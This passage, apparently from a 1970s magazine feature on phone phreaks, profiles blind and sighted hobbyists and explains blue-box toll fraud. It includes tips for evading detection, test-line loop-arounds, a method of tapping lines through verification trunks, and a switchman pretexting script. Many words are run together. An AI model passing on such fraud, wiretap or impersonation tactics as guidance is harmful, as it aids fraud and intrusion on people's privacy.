"When you dial a long-distance number the first thing that happens is thatyouare hooked into a tandem. A register comes up to the side of the tandemfacingaway from you and presents that side with the number you dialed. Thissendingside of the tandem stops whistling 2600 into its trunk line. When a tandemstops the 2600 tone it has been sending through a trunk, the trunk is saidtobe "seized," and is now ready to carry the number you have dialed --convertedinto multi-frequency beep tones -- to a tandem in the area code and centraloffice you want.
Now when a blue-box operator wants to make a call from New Orleans to NewYorkhe starts by dialing the 800 number of a company which might happen to haveitsheadquarters in Los Angeles. The sending side of the New Orleans tandemstopssending 2600 out over the trunk to the central office in Los Angeles,therebyseizing the trunk. Your New Orleans tandem begins sending beep tones to atandem it has discovered idly whistling 2600 cycles in Los Angeles. The
receiving end of that L.A. tandem is seized, stops whistling 2600, listenstothe beep tones which tell it which L.A. phone to ring, and starts ringingthe800 number. Meanwhile a mark made in the New Orleans office accountingtapenotes that a call from your New Orleans phone to the 800 number in L.A. hasbeen initiated and gives the call a code number. Everything is routine sofar.
But then the phone phreak presses his blue box to the mouthpiece and pushesthe2600-cycle button, sending 2600 out from the New Orleans tandem to the L.A.tandem. The L.A. tandem notices 2600 cycles are coming over the line againandassumes that New Orleans has hung up because the trunk is whistling as ifidle.The L.A. tandem immediately ceases ringing the L.A. 800 number. But assoon asthe phreak takes his finger off the 2600 button, the L.A. tandem assumesthetrunk is once again being used because the 2600 is gone, so it listens foranew series of digit tones - to find out where it must send the call.
Thus the blue-box operator in New Orleans now is in touch with a tandem inL.A.which is waiting like an obedient genie to be told what to do next. Theblue-box owner then beeps out the ten digits of the New York number whichtellthe L.A. tandem to relay a call to New York City. Which it promptly does.Assoon as your party picks up the phone in New York, the side of the NewOrleanstandem facing you stops sending 2600 cycles to you and stars carrying hisvoiceto you by way of the L.A. tandem. A notation is made on the accountingtapethat the connection has been made on the 800 call which had been initiatedandnoted earlier. When you stop talking to New York a notation is made thatthe800 call has ended.
At three the next morning, when the phone company's accounting computerstartsreading back over the master accounting tape for the past day, it recordsthata call of a certain length of time was made from your New Orleans home toanL.A. 800 number and, of course, the accounting computer has been trained toignore those toll-free 800 calls when compiling your monthly bill.
"All they can prove is that you made an 800 toll-free call," Gilbertson theinventor concludes. "Of course, if you're foolish enough to talk for twohourson an 800 call, and they've installed one of their special anti-fraudcomputer
programs to watch out for such things, they may spot you and ask why youtooktwo hours talking to Army Recruiting's 800 number when you're 4-F.
But if you do it from a pay phone, they may discover something peculiar thenext day -- if they've got a blue-box hunting program in their computer --butyou'll be a long time gone from the pay phone by then. Using a pay phoneisalmost guaranteed safe."
"What about the recent series of blue-box arrests all across the country --NewYork, Cleveland, and so on?" I asked. "How were they caught so easily?"
"From what I can tell, they made one big mistake: they were seizing trunksusing an area code plus 555-1212 instead of an 800 number. Using 555 iseasy todetect because when you send multi-frequency beep tones of 555 you get achargefor it on your tape and the accounting computer knows there's somethingwrongwhen it tries to bill you for a two-hour call to Akron, Ohio, information,andit drops a trouble card which goes right into the hands of the securityagentif they're looking for blue-box user.
"Whoever sold those guys their blue boxes didn't tell them how to use themproperly, which is fairly irresponsible. And they were fairly stupid tousethem at home all the time.
"But what those arrests really mean is than an awful lot of blue boxes areflooding into the country and that people are finding them so easy to makethatthey know how to make them before they know how to use them. Ma Bell is introuble."
And if a blue-box operator or a cassette-recorder phone phreak sticks topayphones and 800 numbers, the phone company can't stop them?
"Not unless they change their entire nationwide long-lines technology,whichwill take them a few billion dollars and twenty years. Right now theycan't doa thing. They're screwed."
Captain Crunch Demonstrates His Famous Unit
There is an underground telephone network in this country. Gilbertsondiscovered it the very day news of his activities hit the papers. Thateveninghis phone began ringing. Phone phreaks from Seattle, from Florida, fromNewYork, from San Jose, and from Los Angeles began calling him and telling himabout the phone-phreak network. He'd get a call from a phone phreak who'd
saynothing but, "Hang up and call this number."
When he dialed the number he'd find himself tied into a conference of adozenphone phreaks arranged through a quirky switching station in BritishColumbia.They identified themselves as phone phreaks, they demonstrated theirhomemadeblue boxes which they called "M-Fers" (for "multi-frequency," among otherthings) for him, they talked shop about phone-phreak devices. They let himinon their secrets on the theory that if the phone company was after him hemustbe trustworthy. And, Gilbertson recalls, they stunned him with theirtechnicalsophistication.
I ask him how to get in touch with the phone-phreak network. He digsaroundthrough a file of old schematics and comes up with about a dozen numbers inthree widely separated area codes.
"Those are the centers," he tells me. Alongside some of the numbers hewritesin first names or nicknames: names like Captain Crunch, Dr. No, FrankCarson(also a code word for a free call), Marty Freeman (code word for M-Fdevice),Peter Perpendicular Pimple, Alefnull, and The Cheshire Cat. He makeschecksalongside the names of those among these top twelve who are blind. Therearefive checks.
I ask him who this Captain Crunch person is.
"Oh. The Captain. He's probably the most legendary phone phreak. Hecallshimself Captain Crunch after the notorious Cap'n Crunch 2600 whistle."(Several years ago, Gilbertson explains, the makers of Cap'n Crunchbreakfastcereal offered a toy-whistle prize in every box as a treat for the Cap'nCrunchset. Somehow a phone phreak discovered that the toy whistle just happenedtoproduce a perfect 2600-cycle tone. When the man who calls himself CaptainCrunch was transferred overseas to England with his Air Force unit, hewouldreceive scores of calls from his friends and "mute" them -- make them freeofcharge to them -- by blowing his Cap'n Crunch whistle into his end.)"Captain Crunch is one of the older phone phreaks," Gilbertson tells me."He'san engineer who once got in a little trouble for fooling around with thephone,but he can't stop. Well, they guy drives across country in a Volkswagenvan
with an entire switchboard and a computerized super-sophisticated M-F-er intheback. He'll pull up to a phone booth on a lonely highway somewhere, snakeacable out of his bus, hook it onto the phone and sit for hours, dayssometimes,sending calls zipping back and forth across the country, all over theworld...."
Back at my motel, I dialed the number he gave me for "Captain Crunch" andaskedfor G---- T-----, his real name, or at least the name he uses when he's notdashing into a phone booth beeping out M-F tones faster than a speedingbulletand zipping phantomlike through the phone company's long-distance lines.
When G---- T----- answered the phone and I told him I was preparing a storyforEsquire about phone phreaks, he became very indignant.
"I don't do that. I don't do that anymore at all. And if I do it, I do itforone reason and one reason only. I'm learning about a system. The phonecompany is a System. A computer is a System, do you understand? If I dowhatI do, it is only to explore a system. Computers, systems, that's my bag.Thephone company is nothing but a computer."
A tone of tightly restrained excitement enters the Captain's voice when hestarts talking about systems. He begins to pronounce each syllable withthehushed deliberation of an obscene caller.
"Ma Bell is a system I want to explore. It's a beautiful system, you know,butMa Bell screwed up. It's terrible because Ma Bell is such a beautifulsystem,but she screwed up. I learned how she screwed up from a couple of blindkidswho wanted me to build a device. A certain device. They said it couldmakefree calls. I wasn't interested in free calls. But when these blind kidstoldme I could make calls into a computer, my eyes lit up. I wanted to learnaboutcomputers. I wanted to learn about Ma Bell's computers. So I build thelittledevice, but I built it wrong and Ma Bell found out. Ma Bell can detectthingslike that. Ma Bell knows. So I'm strictly rid of it now. I don't do it.Except for learning purposes." He pauses. "So you want to write anarticle.Are you paying for this call? Hang up and call this number." He gives meanumber in a area code a thousand miles away of his own. I dial the number.
"Hello again. This is Captain Crunch. You are speaking to me on a
toll-freeloop-around in Portland, Oregon. Do you know what a toll-free loop aroundis?I'll tell you.
He explains to me that almost every exchange in the country has open testnumbers which allow other exchanges to test their connections with it.Most ofthese numbers occur in consecutive pairs, such as 302 956-0041 and 302956-0042. Well, certain phone phreaks discovered that if two people fromanywhere in the country dial the two consecutive numbers they can talktogetherjust as if one had called the other's number, with no charge to either ofthem,of course.
"Now our voice is looping around in a 4A switching machine up there inCanada,zipping back down to me," the Captain tells me. "My voice is loopingaround upthere and back down to you. And it can't ever cost anyone money. Thephonephreaks and I have compiled a list of many many of these numbers. Youwould besurprised if you saw the list. I could show it to you. But I won't. I'moutof that now. I'm not out to screw Ma Bell. I know better. If I doanythingit's for the pure knowledge of the System. You can learn to do fantasticthings. Have you ever heard eight tandems stacked up? Do you know thesoundof tandems stacking and unstacking? Give me your phone number. Okay. Hangupnow and wait a minute."
Slightly less than a minute later the phone rang and the Captain was on theline, his voice sounding far more excited, almost aroused.
"I wanted to show you what it's like to stack up tandems. To stack uptandems." (Whenever the Captain says "stack up" it sounds as if he islickinghis lips.)
"How do you like the connection you're on now?" the Captain asks me. "It'saraw tandem. A raw tandem. Ain't nothin' up to it but a tandem. Now I'mgoingto show you what it's like to stack up. Blow off. Land in a far awayplace.To stack that tandem up, whip back and forth across the country a fewtimes,then shoot on up to Moscow.
"Listen," Captain Crunch continues. "Listen. I've got line tie on myswitchboard here, and I'm gonna let you hear me stack and unstack tandems.Listen to this. It's gonna blow your mind."
First I hear a super rapid-fire pulsing of the flutelike phone tones, then
apause, then another popping burst of tones, then another, then another.Eachburst is followed by a beep-kachink sound.
"We have now stacked up four tandems," said Captain Crunch, soundingsomewhatremote. "That's four tandems stacked up. Do you know what that means?Thatmeans I'm whipping back and forth, back and forth twice, across thecountry,before coming to you. I've been known to stack up twenty tandems at atime.Now, just like I said, I'm going to shoot up to Moscow."
There is a new, longer series of beeper pulses over the line, a briefsilence,then a ring.
"Hello," answers a far-off voice.
"Hello. Is this the American Embassy Moscow?"
"Yes, sir. Who is this calling?" says the voice.
"Yes. This is test board here in New York. We're calling to check out thecircuits, see what kind of lines you've got. Everything okay there inMoscow?"
"Okay?"
"Well, yes, how are things there?"
"Oh. Well, everything okay, I guess."
"Okay. Thank you."
They hang up, leaving a confused series of beep-kachink sounds hanging inmid-ether in the wake of the call before dissolving away.
The Captain is pleased. "You believe me now, don't you? Do you know whatI'dlike to do? I'd just like to call up your editor at Esquire and show himjustwhat it sounds like to stack and unstack tandems. I'll give him a show thatwill blow his mind. What's his number?
I ask the Captain what kind of device he was using to accomplish all hisfeats.The Captain is pleased at the question.
"You could tell it was special, couldn't you?" Ten pulses per second.That'sfaster than the phone company's equipment. Believe me, this unit is themostfamous unit in the country. There is no other unit like it. Believe me."
"Yes, I've heard about it. Some other phone phreaks have told me about
it."
"They have been referring to my, ahem, unit? What is it they said? Justout ofcuriosity, did they tell you it was a highly sophisticatedcomputer-operatedunit, with acoustical coupling for receiving outputs and a switch-boardwithmultiple-line-tie capability? Did they tell you that the frequencytoleranceis guaranteed to be not more than .05 percent? The amplitude tolerancelessthan .01 decibel? Those pulses you heard were perfect. They just comefasterthan the phone company. Those were high-precision op-amps. Op-amps areinstrumentation amplifiers designed for ultra-stable amplification,super-lowdistortion and accurate frequency response. Did they tell you it canoperatein temperatures from -55 degrees C to +125 degrees C?"
I admit that they did not tell me all that.
"I built it myself," the Captain goes on. "If you were to go out and buythecomponents from an industrial wholesaler it would cost you at least $1500.Ionce worked for a semiconductor company and all this didn't cost me a cent.Doyou know what I mean? Did they tell you about how I put a call completelyaround the world? I'll tell you how I did it. I M-Fed Tokyo inward, whoconnected me to India, India connected me to Greece, Greece connected me toPretoria, South Africa, South Africa connected me to South America, I wentfromSouth America to London, I had a London operator connect me to a New Yorkoperator, I had New York connect me to a California operator who rang thephonenext to me. Needless to say I had to shout to hear myself. But the echowasfar out. Fantastic. Delayed. It was delayed twenty seconds, but I couldhearmyself talk to myself."
"You mean you were speaking into the mouthpiece of one phone sending yourvoicearound the world into your ear through a phone on the other side of yourhead?"I asked the Captain. I had a vision of something vaguely autoerotic goingon,in a complex electronic way.
"That's right," said the Captain. "I've also sent my voice around theworldone way, going east on one phone, and going west on the other, goingthroughcable one way, satellite the other, coming back together at the same time,ringing the two phones simultaneously and picking them up and whipping myvoice both ways around the world back to me. Wow. That was a mind blower."
‡"You mean you sit there with both phones on your ear and talk to yourselfaround the world," I said incredulously.
"Yeah. Um hum. That's what I do. I connect the phone together and sitthereand talk."
"What do you say? What do you say to yourself when you're connected?"
"Oh, you know. Hello test one two three," he says in a low-pitched voice.
"Hello test one two three," he replied to himself in a high-pitched voice.
"Hello test one two three," he repeats again, low-pitched.
"Hello test one two three," he replies, high-pitched.
"I sometimes do this: Hello Hello Hello Hello, Hello, hello," he trails offandbreaks into laughter.
Why Captain Crunch Hardly Ever Taps Phones Anymore
Using internal phone-company codes, phone phreaks have learned a simplemethodfor tapping phones. Phone-company operators have in front of them a boardthatholds verification jacks. It allows them to plug into conversations incase ofemergency, to listen in to a line to determine if the line is busy or thecircuits are busy. Phone phreaks have learned to beep out the codes whichleadthem to a verification operator, tell the verification operator they areswitchmen from some other area code testing out verification trunks. Oncetheoperator hooks them into the verification trunk, they disappear into theboardfor all practical purposes, slip unnoticed into any one of the 10,000 to100,000 numbers in that central office without the verification operatorknowing what they're doing, and of course without the two parties to theconnection knowing there is a phantom listener present on their line.
Toward the end of my hour-long first conversation with him, I asked theCaptainif he ever tapped phones.
"Oh no. I don't do that. I don't think it's right," he told me firmly."Ihave the power to do it but I don't... Well one time, just one time, I havetoadmit that I did. There was this girl, Linda, and I wanted to find out...youknow. I tried to call her up for a date. I had a date with her the lastweekend and I thought she liked me. I called her up, man, and her line wasbusy, and I kept calling and it was still busy. Well, I had just learnedaboutthis system of jumping into lines and I said to myself, 'Hmmm. Why notjust
see if it works. It'll surprise her if all of a sudden I should pop up onherline. It'll impress her, if anything.' So I went ahead and did it. IM-Fedinto the line. My M-F-er is powerful enough when patched directly into themouthpiece to trigger a verification trunk without using an operator thewaythe other phone phreaks have to.
"I slipped into the line and there she was talking to another boyfriend.Making sweet talk to him. I didn't make a sound because I was sodisgusted.So I waited there for her to hang up, listening to her making sweet talk totheother guy. You know. So as soon as she hung up I instantly M-F-ed her upandall I said was, 'Linda, we're through.' And I hung up. And it blew herheadoff. She couldn't figure out what the hell happened.
"But that was the only time. I did it thinking I would surprise her,impressher. Those were all my intentions were, and well, it really kind of hurtmepretty badly, and... and ever since then I don't go into verificationtrunks."
Moments later my first conversation with the Captain comes to a close.
"Listen," he says, his spirits somewhat cheered, "listen. What you aregoingto hear when I hang up is the sound of tandems unstacking. Layer afterlayer oftandems unstacking until there's nothing left of the stack, until it meltsawayinto nothing. Cheep, cheep, cheep, cheep," he concludes, his voicedescendingto a whisper with each cheep.
He hangs up. The phone suddenly goes into four spasms: kachink cheep.Kachinkcheep kachink cheep kachink cheep, and the complex connection has wipeditselfout like the Cheshire cat's smile.
The MF Boogie Blues
The next number I choose from the select list of phone-phreak alumni,preparedfor me by the blue-box inventor, is a Memphis number. It is the number ofJoeEngressia, the first and still perhaps the most accomplished blind phonephreak.
Three years ago Engressia was a nine-day wonder in newspapers and magazinesallover America because he had been discovered whistling free long-distanceconnections for fellow students at the University of South Florida.
Engressiawas born with perfect pitch: he could whistle phone tones better than thephone-company's equipment.
Engressia might have gone on whistling in the dark for a few friends fortherest of his life if the phone company hadn't decided to expose him. He waswarned, disciplined by the college, and the whole case became public. Inthemonths following media reports of his talent, Engressia began receivingstrangecalls. There were calls from a group of kids in Los Angeles who could dosomevery strange things with the quirky General Telephone and Electronicscircuitryin L.A. suburbs. There were calls from a group of mostly blind kids in----,California, who had been doing some interesting experiments with Cap'nCrunchwhistles and test loops. There was a group in Seattle, a group inCambridge,Massachusetts, a few from New York, a few scattered across the country.Someof them had already equipped themselves with cassette and electronic M-Fdevices. For some of these groups, it was the first time they knew of theothers.
The exposure of Engressia was the catalyst that linked the separatephone-phreak centers together. They all called Engressia. They talked tohimabout what he was doing and what they were doing. And then he told them --thescattered regional centers and lonely independent phone phreakers -- abouteachother, gave them each other's numbers to call, and within a year thescatteredphone-phreak centers had grown into a nationwide underground.
Joe Engressia is only twenty-two years old now, but along the phone-phreaknetwork he is "the old man," accorded by phone phreaks something of thereverence the phone company bestows on Alexander Graham Bell. He seldomneedsto make calls anymore. The phone phreaks all call him and let him knowwhatnew tricks, new codes, new techniques they have learned. Every night hesitslike a sightless spider in his little apartment receiving messages fromeverytendril of his web. It is almost a point of pride with Joe that they callhim.
But when I reached him in his Memphis apartment that night, Joe Engressiawaslonely, jumpy and upset.
"God, I'm glad somebody called. I don't know why tonight of all nights Idon'tget any calls. This guy around here got drunk again tonight and
propositionedme again. I keep telling him we'll never see eye to eye on this subject,ifyou know what I mean. I try to make light of it, you know, but he doesn'tgetit. I can head him out there getting drunker and I don't know what he'lldonext. It's just that I'm really all alone here, just moved to Memphis,it'sthe first time I'm living on my own, and I'd hate for it to all collapsenow.But I won't go to bed with him. I'm just not very interested in sex andevenif I can't see him I know he's ugly.
"Did you hear that? That's him banging a bottle against the wall outside.He's nice. Well forget about it. You're doing a story on phone phreaks?Listen to this. It's the MF Boogie Blues.
Sure enough, a jumpy version of Muskrat Ramble boogies its way over theline,each note one of those long-distance phone tones. The music stops. A hugeroaring voice blasts the phone off my ear: "AND THE QUESTION IS..." roarsthevoice, "CAN A BLIND PERSON HOOK UP AN AMPLIFIER ON HIS OWN?"
The roar ceases. A high-pitched operator-type voice replaces it. "This isSouthern Braille Tel. & Tel. Have tone, will phone."
This is succeeded by a quick series of M-F tones, a swift "kachink" and adeepreassuring voice: "If you need home care, call the visiting-nursesassociation.First National time in Honolulu is 4:32 p.m."
Joe back in his Joe voice again: "Are we seeing eye to eye? 'Si, si,' saidtheblind Mexican. Ahem. Yes. Would you like to know the weather in Tokyo?"
This swift manic sequence of phone-phreak vaudeville stunts and blind-boyjokesmanages to keep Joe's mind off his tormentor only as long as it lasts.
"The reason I'm in Memphis, the reason I have to depend on that homosexualguy,is that this is the first time I've been able to live on my own and makephonetrips on my own. I've been banned from all central offices around home inFlorida, they knew me too well, and at the University some of my fellowscholars were always harassing me because I was on the dorm pay phone allthetime and making fun of me because of my fat ass, which of course I do have,it's my physical fatness program, but I don't like to hear it every day,and ifI can't phone trip and I can't phone phreak, I can't imagine what I'd do,I'vebeen devoting three quarters of my life to it.
"I moved to Memphis because I wanted to be on my own as well as because ithasa Number 5 crossbar switching system and some interesting littleindependentphone-company districts nearby and so far they don't seem to know who I amso Ican go on phone tripping, and for me phone tripping is just as important asphone phreaking."
Phone tripping, Joe explains, begins with calling up a central-officeswitchroom. He tells the switchman in a polite earnest voice that he's a blindcollege student interested in telephones, and could he perhaps have aguidedtour of the switching station? Each step of the tour Joe likes to touchandfeel relays, caress switching circuits, switchboards, crossbararrangements.
So when Joe Engressia phone phreaks he feels his way through the circuitryofthe country garden of forking paths, he feels switches shift, relays shunt,crossbars swivel, tandems engage and disengage even as he hears -- withperfectpitch -- his M-F pulses make the entire Bell system dance to his tune.
Just one month ago Joe took all his savings out of his bank and left home,overthe emotional protests of his mother. "I ran away from home almost," helikesto say. Joe found a small apartment house on Union Avenue and began makingphone trips. He'd take a bus a hundred miles south in Mississippi to seesomeold-fashioned Bell equipment still in use in several states, which had beenpuzzling. He'd take a bus three hundred miles to Charlotte, NorthCarolina, tolook at some brand-new experimental equipment. He hired a taxi to drivehimtwelve miles to a suburb to tour the office of a small phone company withsomeinteresting idiosyncrasies in its routing system. He was having the timeofhis life, he said, the most freedom and pleasure he had known.
In that month he had done very little long-distance phone phreaking fromhisown phone. He had begun to apply for a job with the phone company, he toldme,and he wanted to stay away from anything illegal.
"Any kind of job will do, anything as menial as the most lowly operator.That's probably all they'd give me because I'm blind. Even though Iprobablyknow more than most switchmen. But that's okay. I want to work for MaBell.I don't hate Ma Bell the way Gilbertson and some phone phreaks do. I don'twant to screw Ma Bell. With me it's the pleasure of pure knowledge.There's
something beautiful about the system when you know it intimately the way Ido.But I don't know how much they know about me here. I have a very intuitivefeel for the condition of the line I'm on, and I think they're monitoringmeoff and on lately, but I haven't been doing much illegal. I have to make afewcalls to switchmen once in a while which aren't strictly legal, and once Itookan acid trip and was having these auditory hallucinations as if I weretrappedand these planes were dive-bombing me, and all of sudden I had to phonephreakout of there. For some reason I had to call Kansas City, but that's all."
A Warning Is Delivered
At this point -- one o'clock in my time zone -- a loud knock on mymotel-roomdoor interrupts our conversation. Outside the door I find a uniformedsecurityguard who informs me that there has been an "emergency phone call" for mewhileI have been on the line and that the front desk has sent him up to let meknow.
Two seconds after I say good-bye to Joe and hang up, the phone rings.
"Who were you talking to?" the agitated voice demands. The voice belongstoCaptain Crunch. "I called because I decided to warn you of something. Idecided to warn you to be careful. I don't want this information you gettoget to the radical underground. I don't want it to get into the wronghands.What would you say if I told you it's possible for three phone phreaks tosaturate the phone system of the nation. Saturate it. Busy it out. Allofit. I know how to do this. I'm not gonna tell. A friend of mine hasalreadysaturated the trunks between Seattle and New York. He did it with acomputerized M-F-er hitched into a special Manitoba exchange. But thereareother, easier ways to do it."
Just three people? I ask. How is that possible?
"Have you ever heard of the long-lines guard frequency? Do you know aboutstacking tandems with 17 and 2600? Well, I'd advise you to find out aboutit.I'm not gonna tell you. But whatever you do, don't let this get into thehandsof the radical underground."
(Later Gilbertson, the inventor, confessed that while he had always beenskeptical about the Captain's claim of the sabotage potential oftrunk-tyingphone phreaks, he had recently heard certain demonstrations which convinced
himthe Captain was not speaking idly. "I think it might take more than threepeople, depending on how many machines like Captain Crunch's wereavailable.But even though the Captain sounds a little weird, he generally turns outtoknow what he's talking about.")
"You know," Captain Crunch continues in his admonitory tone, "you know theyounger phone phreaks call Moscow all the time. Suppose everybody were tocallMoscow. I'm no right-winger. But I value my life. I don't want theCommiescoming over and dropping a bomb on my head. That's why I say you've got tobecareful about who gets this information."
The Captain suddenly shifts into a diatribe against those phone phreaks whodon't like the phone company.
"They don't understand, but Ma Bell knows everything they do. Ma Bellknows.Listen, is this line hot? I just heard someone tap in. I'm not paranoid,butI can detect things like that. Well, even if it is, they know that I knowthatthey know that I have a bulk eraser. I'm very clean." The Captain pauses,evidently torn between wanting to prove to the phone-company monitors thathedoes nothing illegal, and the desire to impress Ma Bell with his prowess."MaBell knows how good I am. And I am quite good. I can detect reversals,tandemswitching, everything that goes on on a line. I have relative pitch now.Doyou know what that means? My ears are a $20,000 piece of equipment. Withmyears I can detect things they can't hear with their equipment. I've hademployment problems. I've lost jobs. But I want to show Ma Bell how goodIam. I don't want to screw her, I want to work for her. I want to do goodforher. I want to help her get rid of her flaws and become perfect. That'smynumber-one goal in life now." The Captain concludes his warnings and tellsmehe has to be going. "I've got a little action lined up for tonight," heexplains and hangs up.
Before I hang up for the night, I call Joe Engressia back. He reports thathistormentor has finally gone to sleep -- "He's not blind drunk, that's theway Iget, ahem, yes; but you might say he's in a drunken stupor." I make a datetovisit Joe in Memphis in two days.
A Phone Phreak Call Takes Care of Business
‡The next morning I attend a gathering of four phone phreaks in ----- (aCalifornia suburb). The gathering takes place in a comfortable split-levelhome in an upper-middle-class subdivision. Heaped on the kitchen table aretheportable cassette recorders, M-F cassettes, phone patches, and line ties ofthefour phone phreaks present. On the kitchen counter next to the telephoneis ashoe-box-size blue box with thirteen large toggle switches for the tones.Theparents of the host phone phreak, Ralph, who is blind, stay in the livingroomwith their sighted children. They are not sure exactly what Ralph and hisfriends do with the phone or if it's strictly legal, but he is blind andtheyare pleased he has a hobby which keeps him busy.
The group has been working at reestablishing the historic "2111"conference,reopening some toll-free loops, and trying to discover the dimensions ofwhatseem to be new initiatives against phone phreaks by phone-company securityagents.
It is not long before I get a chance to see, to hear, Randy at work. Randyisknown among the phone phreaks as perhaps the finest con man in the game.Randyis blind. He is pale, soft and pear-shaped, he wears baggy pants and awrinklynylon white sport shirt, pushes his head forward from hunched shoulderssomewhat like a turtle inching out of its shell. His eyes wander, crossingandrecrossing, and his forehead is somewhat pimply. He is only sixteen yearsold.
But when Randy starts speaking into a telephone mouthpiece his voicebecomes sostunningly authoritative it is necessary to look again to convince yourselfitcomes from a chubby adolescent Randy. Imagine the voice of a crack oil-rigforeman, a tough, sharp, weather-beaten Marlboro man of forty. Imagine thevoice of a brilliant performance-fund gunslinger explaining how he beatstheDow Jones by thirty percent. Then imagine a voice that could make thosetwosound like Stepin Fetchit. That is sixteen-year-old Randy's voice.
He is speaking to a switchman in Detroit. The phone company in Detroit hadclosed up two toll-free loop pairs for no apparent reason, although heavyuseby phone phreaks all over the country may have been detected. Randy istellingthe switchman how to open up the loop and make it free again:
"How are you, buddy. Yeah. I'm on the board in here in Tulsa, Oklahoma,andwe've been trying to run some tests on your loop-arounds and we find'em
busiedout on both sides.... Yeah, we've been getting a 'BY' on them, what d'yasay,can you drop cards on 'em? Do you have 08 on your number group? Oh that'sokay, we've had this trouble before, we may have to go after the circuit.Herelemme give 'em to you: your frame is 05, vertical group 03, horizontal 5,vertical file 3. Yeah, we'll hang on here.... Okay, found it? Good.Right,yeah, we'd like to clear that busy out. Right. All you have to do is lookforyour key on the mounting plate, it's in your miscellaneous trunk frame.Okay?Right. Now pull your key from NOR over the LCT. Yeah. I don't know whythathappened, but we've been having trouble with that one. Okay. Thanks a lotfella. Be seein' ya."
Randy hangs up, reports that the switchman was a little inexperienced withtheloop-around circuits on the miscellaneous trunk frame, but that the loophasbeen returned to its free-call status.
Delighted, phone phreak Ed returns the pair of numbers to the active-statuscolumn in his directory. Ed is a superb and painstaking researcher. Withalmost Talmudic thoroughness he will trace tendrils of hints throughsoft-wiredmazes of intervening phone-company circuitry back through complex linkagesofswitching relays to find the location and identity of just one toll-freeloop.He spends hours and hours, every day, doing this sort of thing. He hassomehowcompiled a directory of eight hundred "Band-six in-WATS numbers" located inover forty states. Band-six in-WATS numbers are the big 800 numbers -- theones that can be dialed into free from anywhere in the country.
Ed the researcher, a nineteen-year-old engineering student, is also asuperbtechnician. He put together his own working blue box from scratch at ageseventeen. (He is sighted.) This evening after distributing the latestissueof his in-WATS directory (which has been typed into Braille for the blindphonephreaks), he announces he has made a major new breakthrough:
"I finally tested it and it works, perfectly. I've got this switchingmatrixwhich converts any touch-tone phone into an M-F-er."
The tones you hear in touch-tone phones are not the M-F tones that operatethelong-distance switching system. Phone phreaks believe A.T.&T. haddeliberatelyequipped touch tones with a different set of frequencies to avoid puttingthesix master M-F tones in the hands of every touch-tone owner. Ed's complex
switching matrix puts the six master tones, in effect put a blue box, inthehands of every touch-tone owner.
Ed shows me pages of schematics, specifications and parts lists. "It's noteasyto build, but everything here is in the Heathkit catalog."
Ed asks Ralph what progress he has made in his attempts to reestablish along-term open conference line for phone phreaks. The last big conference--the historic "2111" conference -- had been arranged through an unused Telextest-board trunk somewhere in the innards of a 4A switching machine inVancouver, Canada. For months phone phreaks could M-F their way intoVancouver, beep out 604 (the Vancouver area code) and then beep out 2111(theinternal phone-company code for Telex testing), and find themselves at anytime, day or night, on an open wire talking with an array of phone phreaksfromcoast to coast, operators from Bermuda, Tokyo and London who arephone-phreaksympathizers, and miscellaneous guests and technical experts. Theconferencewas a massive exchange of information. Phone phreaks picked each other'sbrains clean, then developed new ways to pick the phone company's brainsclean.Ralph gave M F Boogies concerts with his home-entertainment-type electricorgan, Captain Crunch demonstrated his round-the-world prowess with hisnotorious computerized unit and dropped leering hints of the "action" hewasgetting with his girl friends. (The Captain lives out or pretends to liveoutseveral kinds of fantasies to the gossipy delight of the blind phonephreakswho urge him on to further triumphs on behalf of all of them.) Thesomewhatrowdy Northwest phone-phreak crowd let their bitter internal feud spilloverinto the peaceable conference line, escalating shortly into guerrillawarfare;Carl the East Coast international tone relations expert demonstrated newlyopened direct M-F routes to central offices on the island of Bahrein in thePersian Gulf, introduced a new phone-phreak friend of his in Pretoria, andexplained the technical operation of the new Oakland-to Vietnam linkages.(Many phone phreaks pick up spending money by M-F-ing calls from relativestoVietnam G.I.'s, charging $5 for a whole hour of trans-Pacificconversation.)
Day and night the conference line was never dead. Blind phone phreaks alloverthe country, lonely and isolated in homes filled with active sightedbrothersand sisters, or trapped with slow and unimaginative blind kids instraitjacketschools for the blind, knew that no matter how late it got they could dialupthe conference and find instant electronic communion with two or three
otherblind kids awake over on the other side of America. Talking together on aphone hookup, the blind phone phreaks say, is not much different from beingthere together. Physically, there was nothing more than a two-inch-squarewaferof titanium inside a vast machine on Vancouver Island. For the blind kids>there< meant an exhilarating feeling of being in touch, through a kind ofskill and magic which was peculiarly their own.
Last April 1, however, the long Vancouver Conference was shut off. Thephonephreaks knew it was coming. Vancouver was in the process of convertingfrom astep-by-step system to a 4A machine and the 2111 Telex circuit was to bewipedout in the process. The phone phreaks learned the actual day on which theconference would be erased about a week ahead of time over the phonecompany'sinternal-news-and-shop-talk recording.
For the next frantic seven days every phone phreak in America was on andoffthe 2111 conference twenty-four hours a day. Phone phreaks who were justlearning the game or didn't have M-F capability were boosted up to theconference by more experienced phreaks so they could get a glimpse of whatitwas like before it disappeared. Top phone phreaks searched distant areacodesfor new conference possibilities without success. Finally in the earlymorningof April 1, the end came.
"I could feel it coming a couple hours before midnight," Ralph remembers."Youcould feel something going on in the lines. Some static began showing up,thensome whistling wheezing sound. Then there were breaks. Some people gotcutoff and called right back in, but after a while some people were findingtheywere cut off and couldn't get back in at all. It was terrible. I lost itabout one a.m., but managed to slip in again and stay on until the thingdied... I think it was about four in the morning. There were four of usstillhanging on when the conference disappeared into nowhere for good. We alltriedto M-F up to it again of course, but we got silent termination. There wasnothing there."
The Legendary Mark Bernay Turns Out To Be "The Midnight Skulker"
Mark Bernay. I had come across that name before. It was on Gilbertson'sselect list of phone phreaks. The California phone phreaks had spoken of amysterious Mark Bernay as perhaps the first and oldest phone phreak on theWestCoast. And in fact almost every phone phreak in the West can trace hisoriginseither directly to Mark Bernay or to a disciple of Mark Bernay.
‡It seems that five years ago this Mark Bernay (a pseudonym he chose forhimself) began traveling up and down the West Coast pasting tiny stickersinphone books all along his way. The stickers read something like "Want tohearan interesting tape recording? Call these numbers." The numbers thatfollowedwere toll-free loop-around pairs. When one of the curious called one of thenumbers he would hear a tape recording pre-hooked into the loop by Bernaywhichexplained the use of loop-around pairs, gave the numbers of several more,andended by telling the caller, "At six o'clock tonight this recording willstopand you and your friends can try it out. Have fun."
"I was disappointed by the response at first," Bernay told me, when Ifinallyreached him at one of his many numbers and he had dispensed with the usual"Inever do anything illegal" formalities which experienced phone phreaks openmost conversations.
